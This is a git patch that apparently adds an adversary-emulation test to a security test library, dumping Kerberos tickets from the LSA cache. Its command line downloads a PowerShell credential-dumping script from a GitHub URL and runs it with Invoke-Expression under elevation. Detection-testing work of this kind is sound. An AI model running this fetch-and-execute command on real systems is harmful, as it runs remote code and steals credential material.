From 4d30f39d6ef01bc15c35fe59ea4dd15a12d24cb0 Mon Sep 17 00:00:00 2001
From: skandler <133157403+skandler@users.noreply.github.com>
Date: Fri, 5 Jul 2024 19:32:19 +0200
Subject: [PATCH] Update T1003.004.yaml (#2835)

* Update T1003.004.yaml

dumping kerberos tickets with dumper.ps1 powershell, by dumping the winlogon.exe

* Update T1003.004.yaml

---------

Co-authored-by: Hare Sudhan <code@0x6c.dev>
---
 atomics/T1003.004/T1003.004.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml
index 264311a7..d2f95b3a 100644
--- a/atomics/T1003.004/T1003.004.yaml
+++ b/atomics/T1003.004/T1003.004.yaml
@@ -30,3 +30,18 @@ atomic_tests:
     cleanup_command: del %temp%\secrets >nul 2> nul
     name: command_prompt
     elevation_required: true
+    
+- name: Dump Kerberos Tickets from LSA using dumper.ps1
+
+  description: |
+    This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
+    If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
+    Ref: https://github.com/MzHmO/PowershellKerberos/
+    Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')  
+    name: powershell
+    elevation_required: true